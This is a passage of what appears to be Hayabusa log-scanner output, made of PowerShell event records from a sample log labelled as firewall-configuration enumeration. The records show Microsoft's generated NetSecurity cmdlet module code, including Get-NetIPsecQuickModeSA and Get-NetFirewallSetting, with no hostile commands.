} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.129 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetSecuritySettingData"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallSetting</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""Exemptions""> <Type PSType=""NetSecurity.TrafficExemption""/> <CmdletParameterMetadata PSName=""Exemptions""/> </Parameter> <Parameter ParameterName=""EnableStatefulFtp""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""EnableStatefulFtp""/> </Parameter> <Parameter ParameterName=""EnableStatefulPptp""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""EnableStatefulPptp""/> </Parameter> <Parameter ParameterName=""RemoteMachineTransportAuthorizationList""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteMachineTransportAuthorizationList""/> </Parameter> <Parameter ParameterName=""RemoteMachineTunnelAuthorizationList""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteMachineTunnelAuthorizationList""/> </Parameter> <Parameter ParameterName=""RemoteUserTransportAuthorizationList""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteUserTransportAuthorizationList""/> </Parameter> <Parameter ParameterName=""RemoteUserTunnelAuthorizationList""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteUserTunnelAuthorizationList""/> </Parameter> <Parameter ParameterName=""RequireFullAuthSupport""> <Type PSType=""NetSecurity.GpoBoolean""/> <CmdletParameterMetadata PSName=""RequireFullAuthSupport""/> </Parameter> <Parameter ParameterName=""CertValidationLevel""> <Type PSType=""NetSecurity.CRLCheck""/> <CmdletParameterMetadata PSName=""CertValidationLevel""/> </Parameter> <Parameter ParameterName=""AllowIPsecThroughNAT""> <Type PSType=""NetSecurity.IPsecThroughNAT""/> <CmdletParameterMetadata PSName=""AllowIPsecThroughNAT""/> </Parameter> <Parameter ParameterName=""MaxSAIdleTimeSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxSAIdleTimeSeconds""/> </Parameter> <Parameter ParameterName=""KeyEncoding""> <Type PSType=""NetSecurity.KeyEncoding""/> <CmdletParameterMetadata PSName=""KeyEncoding""/> </Parameter> <Parameter ParameterName=""EnablePacketQueuing""> <Type PSType=""NetSecurity.PacketQueuing""/> <CmdletParameterMetadata PSName=""EnablePacketQueuing""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.TrafficExemption"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""NeighborDiscovery"" Value=""1""/> <Value Name=""Icmp"" Value=""2""/> <Value Name=""RouterDiscovery"" Value=""4""/> <Value Name=""Dhcp"" Value=""8""/> <Value Name=""NotConfigured"" Value=""4294967295""/> </Enum> <Enum EnumName=""NetSecurity.GpoBoolean"" UnderlyingType=""uint16""> <Value Name=""False"" Value=""0""/> <Value Name=""True"" Value=""1""/> <Value Name=""NotConfigured"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Profile"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Public"" Value=""4""/> <Value Name=""Private"" Value=""2""/> <Value Name=""Domain"" Value=""1""/> <Value Name=""NotApplicable"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.CRLCheck"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""AttemptCrlCheck"" Value=""1""/> <Value Name=""RequireCrlCheck"" Value=""2""/> <Value Name=""NotConfigured"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.IPsecThroughNAT"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Server"" Value=""1""/> <Value Name=""Both"" Value=""2""/> <Value Name=""NotConfigured"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.KeyEncoding"" UnderlyingType=""uint16""> <Value Name=""UTF16"" Value=""0""/> <Value Name=""UTF8"" Value=""1""/> <Value Name=""NotConfigured"" Value=""65535""/> </Enum> <Enum EnumName=""NetSecurity.PacketQueuing"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""Inbound"" Value=""1""/> <Value Name=""Forward"" Value=""2""/> <Value Name=""NotConfigured"" Value=""65535""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 